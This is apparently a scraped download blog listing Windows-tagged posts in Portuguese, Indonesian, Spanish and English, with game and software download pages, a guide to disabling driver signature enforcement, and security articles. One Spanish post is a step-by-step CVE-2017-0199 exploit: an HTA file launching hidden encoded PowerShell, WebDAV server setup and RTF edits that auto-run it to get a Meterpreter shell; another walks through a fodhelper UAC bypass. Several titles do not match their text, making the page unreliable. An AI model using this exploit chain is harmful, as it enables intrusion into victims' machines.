Showing posts with label windows. Show all posts
Showing posts with label windows. Show all posts

Thursday, September 28, 2017

Dragon Ball Z A Batalha dos Deuses 1 0 Windows

Dragon Ball Z A Batalha dos Deuses 1 0 Windows



Use o Ki de Goku e companhia para enfrentar o poderoso inimigo!
No mundo dos games � comum encontrar jogos que se baseiam em filmes ou anima��es. Dragon Ball Z - A Batalha dos Deuses segue essa ideia ao retratar o confronto visto no desenho que estreou nos cinemas brasileiros em 11 de outubro deste ano.




A anima��o se passa quatro anos ap�s os acontecimentos da saga de Majin Boo, quando um novo inimigo surge: Bills, conhecido como o deus da destrui��o. Antes que ele reduza tudo o que est� em seu caminho a p� e pilhas de destro�os, cabe a Goku e seus amigos colocar um fim nos planos do vil�o.

Dragon Ball Z - A Batalha dos Deuses pega carona nessa hist�ria. Os confrontos ocorrem numa arena delimitada (como nos jogos da s�rie Smash Bros., da Nintendo), e o jogador pode controlar Goku jogando sozinho, ou qualquer um dos quatro guerreiros com mais tr�s amigos (usando controles de Xbox 360) � lembrando que Bills estar� por si s� no combate.

Dragon Ball Z - A Batalha dos Deuses � uma produ��o nacional, portanto era de se esperar que o game trouxesse dublagem com as vozes que conhecemos por aqui, ajudando a criar uma identidade maior com o p�blico local.

Comandos


  • Setas direcionais: movimentam o personagem;
  • Tecla Esc: pausa o jogo;
  • Teclas W ou Z: travam o inimigo;
  • Teclas E ou X: ataque usando o Ki;
  • Teclas R ou C: ataque f�sico;
  • Tecla D: defesa;
  • Tecla F: teleporte;
  • Tecla G: transforma Goku em Super Sayajin Deus (quando a barra vermelha est� cheia);
  • Barra de espa�o: recarrega o Ki;
  • Barra de espa�o + tecla R: afasta o inimigo;
  • Barra de espa�o + tecla E: golpe especial;
  • Barra de espa�o + tecla F: contra-ataque;
  • Barra de espa�o + setas do teclado: voo r�pido;
  • Seta para cima + tecla R: golpe para cima;
  • Seta para baixo + tecla R: golpe para baixo.




Como baixar o jogo

Dragon Ball Z - A Batalha dos Deuses est� dispon�vel no Nuuvem. O link apresentado aqui encaminha para a p�gina do jogo, onde voc� deve informar um e-mail para receber os caminhos para download.

Vale mencionar que eles s�o tempor�rios. Caso voc� apague o game e queira baix�-lo outra vez no futuro, ser� necess�rio informar novamente o e-mail para que novos links sejam encaminhados.

Informa��es:
  • Tamanho: 53,80 MB
  • Para: Windows XP/Vista/7
  • Data de Cria��o: 11/11/2013
  • Desenvolvedor: Aiyra
  • Idioma: Portugu�s_BR

Download do Jogo:

Link quebrado? Clique na imagem!


Comente!


download file now

Read more »

Download Windows 10 Final Full Version AIO Home Pro Edition Official Full HD

Download Windows 10 Final Full Version AIO Home Pro Edition Official Full HD


hi,this is a amazing and nice LG Mobile phone flashing software (Flash Tool) latest version is released on 4rd July 2017, And now it has been ready to direct download from its official servers and you can download free. LG mobile phone flash tool is completely free to download and very simple to use. LG flash tool is the best and only ROM flash tool that support any kind of LG smartphones. You can flash greater than 1GB KDZ File using this flashing software.LG smartphone flash tool is developed by XDA Developers. If you want to download Lg  for free, then click the below provided official download link.and if you can download this software you can improve your work and very fastly .this is the all of one software.so you can download free.

download free


download file now

Read more »

Wednesday, September 27, 2017

Tutorial lengkap Cara Menonaktifkan Disable Driver Signature Windows 7 8 8 1 dan 10

Tutorial lengkap Cara Menonaktifkan Disable Driver Signature Windows 7 8 8 1 dan 10


Sebelum mengetahui pada pembahasan, sebenarnya apa sih Driver Signature ?

Driver Signature sebenarnya adalah suatu sistem perlindungan dari windows dengan melakukan verifikasi identitas software atau hardware yang akan di installasi.

Itu artinya setiap software dan hardware yang akan di install pada sistem OS Windows harus telah diverifikasi oleh Microsoft.

Namun karena banyaknya software maupun hardware yang beredar di pasaran tidak memungkinkan melakukan verifikasi data secara cepat ke Microsoft setiap hari mengenai produk mereka aman atau tidak digunakan dan hal ini terjadi pada OS Windows Vista, 7, 8 (8.1) 10 atau yang terbaru.


Biasanya gejala yang dialami oleh �Driver Signature� seperti :

  • Windows requires digitally signed driver OR Digitally signed driver is required.
  • Windows cannot verify the digital signature for this file. (0xc0000428)
  • Digital Signature Not Found.
  • Cannot load or install an unsigned driver.
  • Cannot run (execute) an unsigned software (program).
  • Windows did not find a Microsoft signature associated with the software package you want to install.

Setelah mengetahui masalah yang terjadi,  apa  yang harus dilakukan...?

Baca dan pahami perlahan-lahan step by step cara mengatasinya.


Tutorial lengkap Cara Menonaktifkan [Disable] Driver Signature Windows 7, 8 (8.1) dan 10  

 

Tutorial ini sebenarnya tidak untuk di khususkan pada proses penginstalan MiFlashtool saja tapi berlaku secara umum pada software atau hardware lain yang bermasalah dalam proses installasinya.

Perlu Anda ingat bahwa menonaktifkan Driver Signature akan beresiko pada keamanan, dan Anda harus Menonaktifkan hanya jika Anda yakin bahwa driver atau program yang ingin Anda install dan menjalankannya dipercaya dan sah.

Ada dua solusi yang dapat Anda gunakan untuk menyelesaikan masalah ini.

Cara Pertama : Tidak Permanen  

bagi Anda pengguna OS Windows 7 ikuti langlah-lankah berikut ini :
  1. Tutup semua program yang sedang berjalan pada komputer Anda dan Reboot atau Restart
  2. Tunggu beberapa saat apabila pada layar terlihat logo Windows segera tekan F8 berulang kali
  3. Kemudian akan muncul menu �Windows Advanced Options� gunakan keyboard untuk mengarahkan pada pilihan �Driver Signature Enforcement� dan tekan �ENTER�
  4. Windows akan hidup secara normal kembali
  5. Dan Silahkan Anda coba kembali mengistall Sofware atau Driver yang bermasalah tersebut
disable driver signature enforemment win 7

Bagaimana kalau Anda menggunakan Windows 8 (8.1) atau 10...?

setting driver sinature win 8, 10

Caranya seperti ini :
  

      1. Arahkan pada Windows Start Button dan klik kanan dan pilih Shut Down or Sign Out

      2. Tekan dan tahan tombol SHIFT dan click Restart. Kemudian Windows akan restarts dan klik menu �Troubleshoot� Pada  �Troubleshoot options� nantinya akan tampil beberapa menu pilihan dan lanjutkan dengan mengklik �Advanced Options�

      3. Kemudian pada  �Advanced Options� terdapat opsi pilihan  dilanjutkan dengan mengklik �Startup Setting�

      step startup setting driver signature


       
      4. Selanjutnya pada �Startup Settings� silihkan klik �Restart�


      step startup setting driver signature enfocement



        5. Setelah itu akan terdapat opsi  yang harus Anda lakukan tekan tombol �F7� atau angka �7� pada keyboard itu artinya Anda memilih opsi �Disable Driver Signature Enforcement�

        6. Tunggu beberapa saat Windows akan kembali berjalan normal dan coba kembali melakukan proses Installasi sofware Miflashtool.

        Windows can�t verify the publisher of this driver software
        Pada saat Anda melakukan prosedur Instalasi Windows akan memberitahukan suatu peringatan 
        �Windows can�t verify the publisher of this driver software� 

        Pada kondisi ini Anda dapat mengabaikan pesan pada peringatan tersebut dan pilih �Install this driver software anyway� untuk menyelesaikan prosedur Installasi.


        Cara Kedua : Secara Permanen


        Catatan : 
        Gunakan solusi ini hanya jika Anda ingin �Driver Signature Enforcement� selalu  di disable atau di non aktifkan.

        Pada pilihan solusi yang ke dua ini kita akan mengubah pengaturan pada loader boot Windows dengan perintah BCDEDIT di command prompt sebagai Admin.

        Ada beberapa tahapan yang harus dilakukan pada solusi yang kedua ini.


        Pertama, lakukan modifikasi Windows Boot Loader. 


        command promp win 7, 8, 10


        Windows 7
        Arahkan kursor pada logo Windows start button dan kemudian pilih All Program > Accessories > dan klik kanan pada command prompt > run as administrator

        Windows 8 (8,1), 10
        Arahkan kursor pada logo Windows start button dan kemudian pilih �Command Prompt (Admin)"
        Dan klik �Yes� pada �user Account Control� pada notifikasi yang muncul.

        bcdedit /set testsigning on

        Kemudian akan muncul Administrator: command Prompt lalu ketikkan perintah dibawah ini :
        bcdedit /set testsigning on

        setelah itu tekan �ENTER�

        Apabila sukses akan muncul pesan �The operation completed successfully�

        Tutup jendela Administrator: Command Prompt dan reboot atau restart komputer

        Dan lakukan proses installasi kembali pada sofware MiFlashtool yang anda akan pergunakan.


        Lantas Bagaimana Mengaktifkan kembali atau Enable �Driver Signature Enforcement� ?

        bcdedit /set testsigning off

        Untuk langkah mengatifkan kembali caranya sama saja dengan cara non aktifkan menggunakan Administrator: Command Prompt tadi, perbedaannya hanya terdapat pada perintah comand prompt yang harus dirubah yang sebelumnya �ON� menjadi �OFF� .


        bcdedit /set testsigning off


        Tekan �ENTER� tutup jendela Administrator: Command Prompt kemudian �RESTART� kembali komputer Anda.

        bcdedit /set nointegritychecks ON

        Jika Anda masih saja tidak dapat melakukan proses installasi driver, coba dengan menggunakan �command Prompt� berikut ini, untuk tahapan-tahapan sama saja dengan tahapan sebelumnya.
        bcdedit /set nointegritychecks ON

        bcdedit /set nointegritychecks OFF

        Sedangkan untuk mengaktifkan kembali hanya mengganti �ON� menjadi �OFF�
        bcdedit /set nointegritychecks OFF


        Kedua, Disable Secure Boot pada BIOS

        Pada tahapan ini masing-masing komputer memiliki setting menu BIOSnya berbeda-beda. Menu disable the secure boot option biasanya ditemukan pada Security Section atau Boot Options, silahkan temukan sendiri.

        Untuk masuk ke menu BIOS restart komputer terlebih dahulu. Karena masing komputer berbeda-beda silahkan baca Tombol Untuk Masuk BIOS pada Berbagai Merek Laptop dan PC.

        Truss... Kok harus �Disable� Secure Boot pada BIOS juga...???
        Begini alasannya disaat melakukan perintah �bcdedit /set testsigning on� di command prompt dan menekan �ENTER� akan muncul pesan 


        "An error has occurred setting the element data.
        The value is protected by Secure Boot policy and cannot be modified or deleted."

        Apabila pesan tersebut tidak muncul abaikan saja tahapan ini.


        Terakhir,  semoga sukses... tetap semangat kalau gagal yukk.. kita diskusikan di kolom kementar. Good Luck Broo...


        Bantu saya mengembangkan website ini menjadi lebih baik lagi, semakin banyak di share semakin banyak yang terbantu.

        Terima kasih atas kunjungannya. 


        download file now

        Read more »

        Tuesday, September 26, 2017

        Top 5 Best Ways for speeding up your Windows 7 and Window 8

        Top 5 Best Ways for speeding up your Windows 7 and Window 8


        Windows PC is one of the best OS ever made. We run many task and do whatever we want with Windows. Here I post Some Best Top 5 ways for speeding up your Windows 7. If your computer running with very slow speed or you wanna prevent your computer from slow speed , so you just need to follow these steps:-

        Keep Your Antivirus Running and Upto date

        Always use latest version of Antivirus in your Windows PC. Everybody know in  Internet there are many type of virus and malware. If you run a good antivirus in your PC ,you PC is more secure and fast. So I suggest you download Microsoft Essentials in your PC. This is totally free by Microsoft.


        Remove Programs that Launch at Startup

        When you start your computer , Many programs are start automatically. These programs affect your boot process speed and system speed. You can stop these programs by running msconfig in run.
        msconfig windows 7



        Remove Unwanted Programs by Uninstalling

        Many times people install so many programs in computer. So I suggest you to remove unwanted software/programs in your computer by Uninstalling. Install only Important Software and never install software from Torrent sites. 
        Remove Unwanted Programs by Uninstalling



        Delete Temporary Files and Junk Files in Computer

        When you install software ,browse the Internet, Play the Game and do any type of activity in computer, your computer make lots of temporary files in temp folder. If you want speed up your computer, so remove that files.
        Download CCleaner Software for removing junk files.


        Top 10 Windows Software for Every Windows User

        Defragment Your HardDrives by Time to Time

        Harddisk defragmenting is the most important thing if your computer data transfer speed is slow. You can do this task atleast one time a week.
        Defragment Your HardDrives by Time to Time




        So follow this guide and you can speed up your window 7 and 8 for Internet, gaming ,booting, perfomence, startup and more.





        download file now

        Read more »

        Monday, September 25, 2017

        FoxTutorials How to install Android 6 0 1 in PC Dual boot Remix OS v3 alongside windows

        FoxTutorials How to install Android 6 0 1 in PC Dual boot Remix OS v3 alongside windows


        Pengarang Akira Toriyama
        Ilustrator Toyotar?
        Penerbit Shueisha
        Demografi Sh?nen
        Majalah V Jump
        Tanggal terbit 20 Juni 2015 � sekarang
        Seri anime televisi
        Sutradara Kimitoshi Chioka (Series Director)
        Produser Osamu Nozaki (Fuji TV)
        Naoko Sagawa (Yomiko Advertising Inc.)
        Atsushi Kido (Toei Animation)
        Penulis Akira Toriyama (Story & Character Draft)
        Penggubah Norihito Sumitomo
        Studio Toei Animation
        Jaringan Fuji TV
        MNCTV
        Tayang perdana 5 Juli 2015 � sekarang
        Episode 46 (Daftar episode)
        Dragon Ball franchise
        Dragon Ball
        Dragon Ball Z
        Dragon Ball Kai
        Dragon Ball GT
        Portal Anime dan Manga
        Dragon Ball Super (???????? ?????, Doragon B?ru S?p?) adalah sebuah seri televisi anime Jepang yang diproduksi oleh Toei Animation yang mulai tayang pada 5 Juli 2015.[1] Ini adalah seri televisi Dragon Ball pertama yang menampilkan sebuah jalan cerita baru dalam 18 tahun dan berlatar setelah kekalahan Majin Buu, saat Bumi telah menjadi damai kembali. Penayangannya adalah pada hari Minggu pukul 09.00 am di Fuji TV.[2]

        Alur

        Produksi

        Musik

        Media yang berkaitan

        Penerimaan

        Lihat pula

        Referensi

        Pranala luar


        download file now

        Read more »

        TeamViewer for Windows

        TeamViewer for Windows


        TeamViewer for Windows



        Establish incoming and outgoing remote connections for real-time support or access to other computers. Participate in meetings and presentations, chat with other people or groups, and make video calls as well. After downloading and installing this software, you will have your first session up and running within seconds.


        https://drive.google.com/open?id=0B-FWNObj503zS0RBMDBoa3FETm8


        download file now

        Read more »

        Sunday, September 24, 2017

        Explotación práctica de CVE 2017 0199 Windows RTF RCE

        Explotación práctica de CVE 2017 0199 Windows RTF RCE


        Red teams, juakers y dem�s fauna est�n enviando masivamente documentos maliciosos que explotan la vulnerabilidad CVE-2017-0199 y luego usan MS17-010 para pivotar a trav�s de dominios internos, literalmente est�n lloviendo shells�

        Si record�is, la vulnerabilidad etiquetada como CVE-2017-0199 naci� como un 0-day que explotaba las �ltimas versiones de Microsoft Office, concretamente un RTF que se vio inicialmente en un manual militar en ruso con objetivos en la Rep�blica de Donestk y que compromet�a el PC de la v�ctima con s�lo abrirlo (permit�a RCE). Luego se us� tambi�n para instalar malware como Latentbot y en campa�as del troyano bancario Dridex, aunque hasta ahora no hab�a mucho detalle del exploit.

        Y digo hasta ahora porque en varios sitios est�n reportando verdaderos tutoriales para montar y llevar a cabo ataques explotando esta vulnerabilidad que, como dec�a al principio, se encadenan con MS17-010 y otros para conseguir verdaderas intrusiones �hasta la cocina�.

        Uno de los m�s "did�cticos" es el de David Routin (@Rewt_1) que plantea un escenario en el que hay que:

        - Modificar el c�digo fuente del RTF con el payload
        - Evitar el error generado al crear un enlace directo al documento HTA
        - Activar autom�ticamente el objeto OLE

        Ech�mosle un vistazo a c�mo llevarlo a cabo paso a paso:

        Paso 1

        Prepara un archivo HTA: (el archivo HTA es una aplicaci�n HTML que puede ejecutar JScript y VBscript)
        Vamos a llamarlo "ms.hta"
        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
        <html >

          <head>

            <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
            <title>Bonjour
            </title>

            <script language="VBScript">
              Set owFrClN0giJ = CreateObject("Wscript.Shell")
              Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
              If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..powershell.exe") Then

              owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
              End If

            </script>
            <hta:application

                             id="oHTA"
                             applicationname="Bonjour"
                             application="yes"
                             >

            </hta:application>
          </head>
          <div>

            <object type="text/html" data="hxxp://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">

            </object>
          </div>  
          <body>
          </body>
        </html>

        Paso 2

        Crea un sencillo documento RTF utilizando Winword con cualquier contenido. (En el ejemplo la frase �This is my official and legit content�)

        Ll�malo "ms.rtf"

        Paso 3

        Sube los 2 archivos a un servidor web en el que tengas control total.
        Normalmente en /var/www/html

        Ahora tenemos que configurar Apache para poder incluir el ms.rtf como un enlace
         a2enmod dav  
         a2enmod dav_fs
         a2enmod dav_lock
         a2enmod headers
         service apache2 restart

        Luego las siguientes directivas:

        - A�adir "Content-Type application/rtf a todos los archivos en /ms
        - Permitir la petici�n PROPFIND realizada por Microsoft Office

        Modifica virtualhost e incluye:
         <Directory /var/www/html/ms/> 
         Header set Content-Type "application/rtf"
         </Directory>
         <Directory />
         Dav on
         </Directory>

        service apache2 restart

        Paso 4

        Crea un simple documento RTF con Winword "exploit.rtf" �Ese ser� el exploit!

        Insertar -> Objeto


        Despu�s de hacer clic en Aceptar, ver�s el contenido del archivo "ms.rtf" con el texto,

        Guarda el archivo como "exploit.rtf"



        En este paso podemos cerrar Winword y pasar a la siguiente fase para cambiar el contenido de ms.rtf con el payload de HTA ...

        Paso 5

        El siguiente paso ser�:
        - cambiar el ms.rtf que hemos incluido con el payload personalizado de HTA
        - El servidor web enviar� un tipo de contenido "application/hta" ... esto ser� interpretado por el cliente Winword que ejecutar� mshta para manejar este tipo de contenido y ejecutar el payload

         cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf  

         vi /etc/apache2/sites-enables/000-default

         Cambia -> application/rtf a application/hta

         como:

         <Directory /var/www/html/ms/>
         Header set Content-Type "application/hta"
         </Directory>

         service apache2 restart

        Paso 6

        En este paso, si el usuario abre el archivo "exploit.rtf", tendr� que hacer doble clic en el objeto del enlace para lanzar el ataque ...

        Si queremos que el objeto OLE se cargue autom�ticamente en la apertura del documento tenemos que editar el archivo exploit.rtf y cambiar:

        objectobjautlink sltpictobjw9073objh509(*
        a
        objectobjautlinkobjupdate sltpict��������..

        En este paso se construye el exploit.

        Explotaci�n:

        Una vez que el usuario abre el documento el objeto OLE se actualiza a trav�s del enlace y mshta se ejecuta gracias al tipo de contenido application / hta entregado por el servidor
        Resultado: se ejecuta el c�digo!

        Ya tenemos Meterpreter


        No nos importa la advertencia ya que el c�digo ya se ha ejecutado ...


        Referencias:
        - http://securityaffairs.co/wordpress/58077/breaking-news/cve-2017-0199-exploitation-poc.html
        - https://github.com/bhdresh/CVE-2017-0199
        - https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html
        - https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
        - https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/


        download file now

        Read more »

        Download BlueStacks Offline Installer for Windows 7 8 8 1 and 10 MAC OS PC

        Download BlueStacks Offline Installer for Windows 7 8 8 1 and 10 MAC OS PC


         Bluestacks is very good software for running android apps in Windows and Mac OS. With bluestack you can run all type of android apps, play all type of android games and see your whatsapp messages in Windows and Mac. 
        Download BlueStacks Offline Installer for Windows 7/8 & MAC PC

        Bluestack is one of the most popular android emulator. Bluestacks is compatible with all type of PC. You can also run Whatsapp in PC from Bluestacks.
        Download Whatsapp for Windows 7 Desktop ,Laptop and PC 

        Bluestacks support all type of android apps and games. You can run facebook and whatsapp android apps inside Windows with the help of Bluestacks.

        Why You Need Bluestacks Offline Installer 

        When you download bluetacks installer from Official Website. Installer size is 9mb. That means this installer files download some elemenst from Internet. If you want Bluestacks in computer you need working Internet connection. Sometimes working Internet connection is not available in every PC. In that point Offline Bluestacks Installer is very helpful for you.
        So Download Offline Bluestacks installer for Windows 7 ,Window 8,8.1 and Windows 10.

        Download BlueStacks offline installer for Windows
        http://forum.xda-developers.com/wiki/BlueStacks_App_Player
         Download Bluestacks offline Installer for Mac OS.
        http://bit.ly/bstkmacbe


        download file now

        Read more »

        Download BlueStacks App Player For Windows Version 3 4 34 1574

        Download BlueStacks App Player For Windows Version 3 4 34 1574


        BlueStacks App Player is a freeware app for windows PC that app allow you to ran Android apps on your PC or Laptop.So if you want to run your favorite mobiles android app,s on your windows PC then you have to install that app on your PC and enjoy full screen gaming or social media experience on your PC or Laptop.




        Fantastic app for Android lovers who want to use at a time two type of OS on one PC Windows & Android they can install that app on there PC and they can used there Laptop as android mobile with wifi and user of BlueStacks more then 200 million people around the world having fun and enjoying full and HD screen gaming and connecting with the world with social media.


        BlueStacks App Player Key Features.
        • Fully customizable environment for PC.
        • Support for multiple OS configurations 32bit and 64bit
        • Google Play integration and support of access play store.
        • Android Emulator supported with investment from Intel, Samsung, Qualcomm and AMD.
        • Layercake� technology enables even the most graphics-intensive games to run smoothly on your PC.
        BlueStacks App Player Supported OS.
        windows all type of versions have support it.

        BlueStacks App Player System Requirements.

        • RAM must be 512 MB.
        • 1 GB free space on your hard drive.
        • MS Net framework 3.0 or higher.
        • Java Must be install on your PC.
        • DirectX 9.0 or higher.
        • 128 MB of Graphic card.
        DOWNLOAD


        download file now

        Read more »

        Saturday, September 23, 2017

        Dragon Ball Z Windows 7 Theme1 0

        Dragon Ball Z Windows 7 Theme1 0



        Cha-la, Head Cha la! Enfeite seu PC com momentos mais emocionantes do seu anime favorito!

        Dragon Ball Z Windows 7 Theme � um tema para a �rea de trabalho do Windows 7 ou 8/8.1 que traz para voc� momentos de batalhas incr�veis do mais famoso anime de todos os tempos. Fora isso, voc� conta ainda com imagens dos seus personagens favoritos reunidos, tudo para trazer de volta aquele gostinho de inf�ncia que as aberturas da saga de Goku proporcionavam todas as manh�s.


        Momentos e personagens



        O pacote de imagens de fundo para sua �rea de trabalho conta com 10 itens ao todo, permitindo a voc� escolher uma ou mais delas para enfeitar a tela do seu PC. Al�m disso, a cor das suas janelas deve ficar pr�xima ao branco, com a devida transpar�ncia aplicada pelo SO. N�o h�, entretanto, um esquema de sons para o tema ou qualquer outro complemento.



        Como o pacote de imagens est� compactado em THEMEPACK, voc� n�o precisa fazer praticamente nada para aplicar o conte�do em seu sistema. Basta realizar um clique duplo no arquivo e aguardar a mudan�a da sua �rea de trabalho.

        Tamanho: 14,75 MB
        Para Windows 7/8
        Adicionado em 18/11/2013
        Desenvolvedor: Windows7Themes.net

        Baixar


        download file now

        Read more »

        Friday, September 22, 2017

        Fileless 3 Bypass UAC en Windows 10 Otro más aunque parezca increíble

        Fileless 3 Bypass UAC en Windows 10 Otro más aunque parezca increíble


        Hoy traemos un nuevo bypass de UAC del tipo Fileless, y van tres descubiertos ya con el de hoy, con el que podemos saltarnos la interacci�n con el usuario para saltar la protecci�n de User Account Control . Este m�todo ha sido encontrado por un investigador alem�n que prepara su tesis sobre este tipo de debilidades de los sistemas de Windows. Es cierto que Microsoft no lo considera una vulnerabilidad, pero ha decidido parchear algunos ya que pueden ser utilizados por malware para lograr ejecutarse como SYSTEM en el equipo.

        Figura 1: Fileless 3: Bypass UAC en MS Windows 10

        Meses atr�s hablamos del Fileless y Fileless 2 como los primeros m�todos en los que no se generaba o se sub�a un fichero a disco para llevar a cabo el bypass. Hoy tenemos un nuevo Fileless y, a priori, van tres ya.

        Figura 2: Art�culo explicando "Fileless 3" por el investigador.

        Como ya hemos comentado en otras ocasiones, tenemos unas pre-condiciones para hacer un bypass de UAC y son las siguientes:
        � El usuario forma parte del grupo administradores. 
        � El UAC tiene la pol�tica por defecto, es decir, no se ha modificado esta pol�tica desde la instalaci�n del sistema. 
        Figura 3: Con la configuraci�n de UAC en "Modo Windows Vista" no funcionan estos bypass
        � En este caso, tenemos un sistema operativo Windows 10. El Fileless 3 solo nos funcionar� en esta versi�n, ya que el binario que permite llevar a cabo el bypass solo se encuentra en esta versi�n.
        Como buen Fileless este bypass radica en errores de los binarios al consultar ramas del registro que se encuentran en HKCU. Si una rama consultada en HKCU no existe, podemos crearla y hacer que exista de forma sencilla. Por esta raz�n, veremos a continuaci�n c�mo de f�cil es encontrar otros bypass de UAC siguiente el patr�n.

        PoC: Fileless 3 in action!

        Vamos a llevar a cabo una prueba de concepto sencilla sobre un sistema Windows 10. Para observar cuando un binario consulta ramas de registro no creadas en HKCU utilizaremos la herramienta Process Monitor. Esta herramienta es f�cil de configurar y, para ello, crearemos un par de filtros, uno para el binario fodhelper.exe y otro para los resultados �NAME NOT FOUND� que se obtengan de consultar al registro, como ya hemos hecho en otros bypass de UAC.

        Figura 4: Filtros en Process Explorer para fodhelper.exe y "NAME NOT FOUND"

        En la imagen podemos ver c�mo la consulta a HKCU:SoftwareClassesms-settingsShellOpencommand nos proporciona un �NAME NOT FOUND�. Si creamos esta ruta en el registro de Windows, ya que se encuentra en HKCU y podemos hacerlo sin problema, y volvemos a ejecutar el binario fodhelper.exe monitorizado con Process Monitor nos encontraremos lo siguiente:

        Figura 5: Falla en la localizaci�n de la clave DelegateExecute

        Si buscamos la ruta HKCU:SoftwareClasessms-settingsshellopencommandDelegateExecute vemos que no existe, es decir, no se encuentra por el binario. Si nos fijamos en la clave anterior, vemos como s� la ha encontrado, pero no la clave DelegateExecute.

        Cuando el String Value de DelegateExecute existe, el binario buscar� la clave por defecto de la ruta HKCU:SoftwareClassesms-settingsshellopencommand ejecutando lo que haya en el valor de dicha clave. Al ser ejecutado con un binario que se est� ejecutando con integridad alta, el nuevo proceso tendr� el mismo nivel de integridad.

        Figura 6: MicEnum permite analizar los niveles de integridad de binarios y claves de registro

        Para revisar los niveles de integridad en Windows se puede utilizar nuestra utilidad de ElevenPaths MicEnum. Adem�s, como el binario fodhelper.exe est� firmado por Microsoft y tiene el AutoElevate a True por lo que no solicitar� la confirmaci�n del usuario con UAC.

        Figura 7: Valor por defecto en la clave DelegateExecute (value not set)

        Ahora, modificamos (Default) e indicamos, por ejemplo, C:WindowsSystem32WindowsPowershellv1.0powershell.exe. Esto har� que cuando invoquemos a fodhelper.exe, �ste acabe abriendo una Powershell con el m�ximo privilegio.

        Figura 8: Valor modificado a ejecuci�n de Powershell

        Os dejamos un video d�nde pod�is ver el proceso de manera sencilla. Un nuevo Fileless que puede ser utilizado en el mundo de la auditor�a y el hacking �tico. Aunque viendo lo que ocurri� con el primer Fileless, hay que estar preparado para luchar contra el posible malware que pueda utilizarlo.

        Figura 9: PoC en V�deo de Fileless 3 UAC Bypass

        Como se puede entender, y hemos visto en otras ocasiones, este tipo de t�cnicas puede utilizarse en un pentesting d�nde poder ser SYSTEM desde un usuario que sea del grupo administradores. Adem�s, se puede utilizar de manera sencilla con Meterpreter en Metasploit gracias a la integraci�n con Powershell que puede hacerse de forma sencilla. Y recuerda, estos m�todos no funcionan si tienes aplicada la M�xima Seguridad a tu Windows.

        Autor: Pablo Gonz�lez P�rez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y �Pentesting con Powershell�, Microsoft MVP en Seguridad y Security Researcher en ElevenPaths  con la colaboraci�n de Santiago Hern�ndez Ramos, nuevo cybersecurity "padawan" researcher en ElevenPaths


        download file now

        Read more »

        Thursday, September 21, 2017

        Download uTorrent For Windows

        Download uTorrent For Windows


        uTorrent (pronounced "MicroTorrent" the symbol for micro ?) is a peer-to-peer enabled client with the protocol BitTorrent , a protocol for p2p download the most popular, designed for distributing files at very high speed. uTorrent is particularly widely used because it is very light and extremely easy to use.

        Operation

        With its interface sobriety foolproof, simply open the link to download, possibly to adjust some settings: setting the bandwidth with priorities, scheduling downloads, auto-download RSS and DHT and downloading can begin. The software is confined at first to the basic functions of alternative BitTorrent clients, but it is particularly effective and very convenient. The application supports downloading multiple files simultaneously, offers optimized bandwidth prioritization between files and management of UPnP devices is also in order. uTorrent supports the protocol encryption for Vuze , BitComet and peer exchange. The software supports the French language , you just have to download the language pack , placing it in the software directory (default is C: Program Files uTorrent), then restart the software.

        Download uTorrent For Windows

        Free

        uTorrent is free in its basic version, but there is an advanced version of uTorrent, pay, called uTorrent more.
        uTorrent more

        uTorrent is a more advanced version of uTorrent with additional functionality such as computer protection using an antivirus integrated that scans files when they are downloaded, embedded codecs for watching videos in HD. It also offers conversion tools to move files from one device to another. Finally, it does not offer advertising.

        Common Problems

        Tracker

        The term refers to the tracker file which you are downloading. If there is a problem with the tracker, it will not just configure uTorrent or your network installation.

        Slow download

        If the download via utorrent does not exceed a few kb per second, regardless of the file, it is likely that this is linked to a network or a limitation of P2P traffic set up by the ISP problem. To work around this problem, it is possible to use the encryption feature of uTorrent. To activate it, simply go to Options / Preferences / BitTorrent and the encryption protocol drop-down list, choose "Forced". Finally, in the Connection tab, check the "random port at startup" box.

        Red arrow


        • A red arrow indicates the file being downloaded is not available. Below the meaning of all symbols:
        • Blue square, and down arrow: The file is being downloaded.
        • Gray square, down arrow: The file is waiting to be downloaded.
        • Red square, down arrow: The file is being downloaded, but there is a problem at the site (in some cases it is necessary to identify the site where the torrent comes).
        • Green square arrow back to the top: The file is being sent.
        • Gray square, arrow up: The file is waiting to be sent.
        • Red square, arrow up: The file being sent, but there is a problem on the remote host.
        • Yellow square, pause icon: The file is paused.
        • Gray square, round icon: The file has been arrested, but the download is complete.
        • Green square icon ok: The file has been arrested and the file is finished downloading.
        • Red square, cross icon: A serious error was encountered on the file. It is better to delete the file run another download.


        Search peer

        If uTorrent is blocked "Search peer" (or in English "Finding peers"), that means its hard to connect to other users. First, check the settings in Preferences / bandwidth and increasing the overall maximum number of connections and the maximum number of connected peers per torrent. It is likely that the problem comes from your firewall or your ISP. In the interface of your box, you can try to lower the security level of the firewall (security mode by default a Livebox for example is set to "High." To correct any port blocking, you can try to go to Preferences / Login and check the "random port each start" box. Ultimately, try reinstalling uTorrent by clicking the "Download" button above.
        Compatibility

        Windows 8

        uTorrent is compatible with all Windows systems from Windows XP to Windows 8.

        Download uTorrent for Windows

        Download uTorrent for Windows

        If your OS is Mac, you can download it via this page.


        download file now

        Read more »

        Wednesday, September 20, 2017

        Hackear Windows 7 2008 R2 con Eternalblue y Doublepulsar de ShadowBroker usando Metasploit

        Hackear Windows 7 2008 R2 con Eternalblue y Doublepulsar de ShadowBroker usando Metasploit


        El pasado viernes 14 de Abril - viernes santo en Espa�a - The Shadow Brokers public� una gran cantidad de herramientas pertenecientes al Arsenal de la NSA. Se puede encontrar dichas herramientas en el repositorio de Github de misterch0c.

        Figura 1: Hackear Windows 7 & Windows Server 2008 R2 con
        ternalblue y Doublepulsar de ShadowBroker usando Metasploit

